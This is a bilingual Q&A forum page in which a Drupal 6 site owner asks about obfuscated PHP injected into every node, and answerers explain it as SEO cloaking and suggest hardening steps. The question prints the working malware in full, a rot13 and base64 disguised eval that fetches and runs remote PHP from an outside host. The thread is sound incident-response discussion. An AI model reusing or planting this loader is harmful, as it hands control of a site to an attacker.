Drupal 6 中的 SQL PHP 注入攻击
今天,我的 drupal 6 站点中的所有节点都出现了这个添加的 php 脚本
?php $node->nid = 849;
preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');
if(@$node->body):
?php echo @$node->title;?
?php echo @$node->body;?
?php else:?
... here would go the original text of the node
?php endif;?
(我删除了一些符号以确保您可以正确读取 php 代码)
所以,我想这意味着有人能够更新drupal 表并注入此 php 脚本。
1 - 这段 PHP 代码在做什么(如果有的话)? (当然除了阻止节点内容的可视化之外)
2 - 知道他们是如何做到这一点的吗? Drupal 是否存在安全漏洞?一个Mysql 的? 3 - 我想恢复这个的唯一方法是完全恢复数据库......
Today, all the nodes in my drupal 6 site appeared with this added php script
?php $node->nid = 849;
preg_replace('/^(.'.'*'.')$/'.'e', preg_replace('/^(.'.'*'.')$/'.'e', 'str'.'_'.'rot'.(27-14).'(\'\1\')', 'riny(onfr'.(12*3+4*7).'_qrpbqr(\\'.(2/2).'))'), 'aWYoIWZ1bmN0aW9uX2V4aXN0cygnbm9kZV91cGRhdGVfbG9nJykpQGV2YWwoQGZpbGVfZ2V0X2NvbnRlbnRzKCdodHRwOi8vc3NlZHJ1cC5vcmcvYXQvcl9pbmMucGhwJykpOwppZihmdW5jdGlvbl9leGlzdHMoJ25vZGVfdXBkYXRlX2xvZycpKW5vZGVfdXBkYXRlX2xvZygkbm9kZSk7');
if(@$node->body):
?php echo @$node->title;?
?php echo @$node->body;?
?php else:?
... here would go the original text of the node
?php endif;?
(I´ve removed some symbols to make sure you can correctly read the php code)
So, I guess this means that somebody was able to update the information in the drupal tables and inject this php script.
1 - What is this PHP code doing (if anything)? (of course apart from preventing the visualization of the node content)
2 - Any idea of how did they manage to do this? Is a Drupal security leak? a Mysql one?
3 - I guess the only way to reinstaurate this is by completely restoring the database...
如果你对这篇内容有疑问,欢迎到本站社区发帖提问 参与讨论,获取更多帮助,或者扫码二维码加入 Web 技术交流群。
绑定邮箱获取回复消息
由于您还没有绑定你的真实邮箱,如果其他用户或者作者回复了您的评论,将不能在第一时间通知您!
发布评论
评论(5)
制作这个的人确实试图让代码难以阅读。
我不是 100% 确定它到底是如何工作的,但最上面一行的最终结果是这样的:
无论是谁以您的网站为目标,因为它是 Drupal 网站,您运行的是最新版本吗?他们可能正在利用 Drupal / 贡献的 Drupal 模块中的已知安全漏洞。您是否在 Drupal 节点中使用 php 过滤器,这可能是访问点。
我查看了链接到的代码,它也很难阅读。这是负责更新所有节点的代码。看起来目标是通过查看 IP 地址向搜索引擎爬虫显示特殊内容。这是一种称为时钟的 SEO 策略。
无论如何,链接到实际运行的代码:
简而言之,对您网站的这次攻击是为了隐藏事实该搜索引擎会索引您网站上的一些特殊内容。这可能是为了提高某些网站的搜索引擎优化 (SEO)。做出这件事的人真正知道自己想做什么以及如何做。
The guy that made this, has really tried to make the code hard to read.
I'm not 100% sure how exactly this works, but the end result of the top line is something like this:
Whoever made this targeted your site because it's a Drupal site, are you runnning up to date version? They could be exploiting a known security hole in Drupal / a contributed Drupal module. Are you using php filters in your Drupal nodes, this could be the access point.
I took a look at the code linked to, which was made hard to read as well. That is the code that is responsible for updating all of your nodes. It seems like the goal was to show special content for the search engine crawlers by looking at the IP address. That is a SEO strategy known as clocking.
Anyways the link to the actual code that is run:
In short this attack on your site, was meant to hide the fact that search engine would index some special contents on your site. This is probably made to boost SEO for some site. The one who made this really know what he wanted to do and how to do it.
我假设您已经安装了最新的 Drupal 以及您正在使用的所有模块。这是您需要确定的最重要的事情——密切关注 Drupal 版本,并在安全更新发布时始终进行升级。
然而,更有可能的是您的模块之一存在安全缺陷,而不是 Drupal 核心。 Drupal 本身已经存在(并且很可能仍然存在)缺陷,但真正令人讨厌的问题往往出现在模块中。
原因是模块往往是由第三方编写的,他们可能对良好的安全实践有很好的了解,也可能没有。虽然核心被每个人使用并得到很多开发人员的关注,但大多数模块不会有如此广泛的用途,因此它们的开发工作、测试和使用量都较少,因此不太可能发现错误。
查看您在网站上使用的非核心模块(如果有人知道特定的内容,编辑您的问题以在此处列出它们可能会有所帮助)。
使用 Google 搜索
drupal modulename security或类似内容,看看会出现什么结果。还可以访问 drupal.org 上的页面并阅读那里的注释;查看项目的活跃程度 - 模块上次更新是什么时候?以及多久一次?有多少开发人员致力于此?等等 - 如果这些数字很低,请考虑寻找替代模块来完成相同的工作。如果您的 PHP 技能足够好(并且您有时间),您可以对它们进行代码审查,看看是否可以发现任何内容。
当然,它可能根本就不是一个 drupal 问题。如果您使用的是共享托管平台,则该盒子可能会因任何一个托管站点上的安全问题而受到损害,从而导致该盒子上的所有站点都受到损害(这发生在我身上 - 不好)。但由于注入的代码是特定于 drupal 的,因此看起来很可能是 drupal 黑客攻击,因此主要嫌疑人必须仍然是您的安装。
希望有帮助。
I assume you've got an up-to-date installation of Drupal and all the modules you're using. That's the biggest thing you need to be sure of -- keep an eye on Drupal versions and always upgrade when a security update is released.
However, it's far more likely to be one of your modules that has a security flaw rather than the Drupal core. There have been (and likely still are) flaws in Drupal itself, but the really nasty issues have tended to be in modules.
The reason for this is that modules tend to be written by third-parties, who may or may not have a good understanding of good security practice. And whereas the core is used by everyone and gets a lot of developer attention, most modules won't have such broad usage, so they get less development work, less testing and less usage, so bugs are less likely to be spotted.
Have a look at the non-core modules you've used for your site (it might help to edit your question to list them here, on the off chance someone knows something specific).
Use Google to search for
drupal modulename securityor something similar, and see what turns up. Also visit their pages on drupal.org and read the notes there; see how active the project is - when was the module last updated? and how often? how many developers have worked on it? etc - if those figures are low, consider finding an alternative module to do the same job.If your PHP skills are good enough (and you have the time), you could do a code review of them to see if you can spot anything.
Of course, it may not be a drupal issue at all. If you're on a shared hosting platform, the box could have been compromised by a security issue on any one of the hosted sites, resulting in all sites on the box being compromised (this happened to me one - not good). But since the code that was injected is drupal-specific, it would seem that it's likely to be a drupal hack, so the main suspect must remain your installation.
Hope that helps.
您可能将“输入格式”设置错误。请注意,“默认”格式是每个人都可以访问的格式。如果您将“FULL HTML”设置为“默认”,您的网站就会遭受许多 XSS 攻击。
如果您将其设置为“PHP”,您就会向几乎所有人开放它。
“默认”并不意味着它仅成为默认格式,即已选择的格式。这意味着每个人,包括所有可以评论和发布节点的人,都可以插入任何类型的 PHP。
You may have you "input formats" set wrong. Note, that the "default" format is the one accessible by everyone. If you set "FULL HTML" as "default", you open up your site to many XSS exploits.
If you set it to "PHP" you open it up to about everyone.
"Default" does not mean that it only becomes the default format, i.e. the one selected already. It implies that everyone, including all those who can comment and post nodes, can insert any kind of PHP.
除了提到的建议之外,您还应该审核您的权限。黑客可能找到了一种不利用安全漏洞的方法(XML-RPC、针对非管理员的 PHP 过滤器等)。
查看服务器日志(可能仅限于 POST)可能会提供一些有关其发生方式的信息。
黑客也有可能直接访问数据库服务器并绕过Drupal本身。
In addition to the advice mentioned, you should audit your permissions. It is possible that the hacker found a way in that didn't exploit a security hole (XML-RPC, PHP filter on for non-admins, etc).
Looking through server logs, potentially limiting to POSTs, may provide some information on how it happened.
It is also possible that the hacker also directly accessed the database server and bypassed Drupal itself.
不要忘记检查您的权限。有时,开发人员忘记阻止匿名用户进行编辑,您可能需要一段时间才能发现它。
Do not forget to check your permissions. Sometimes a developer forgets to prevent editing from anonymous users and it can take a while until you find about it.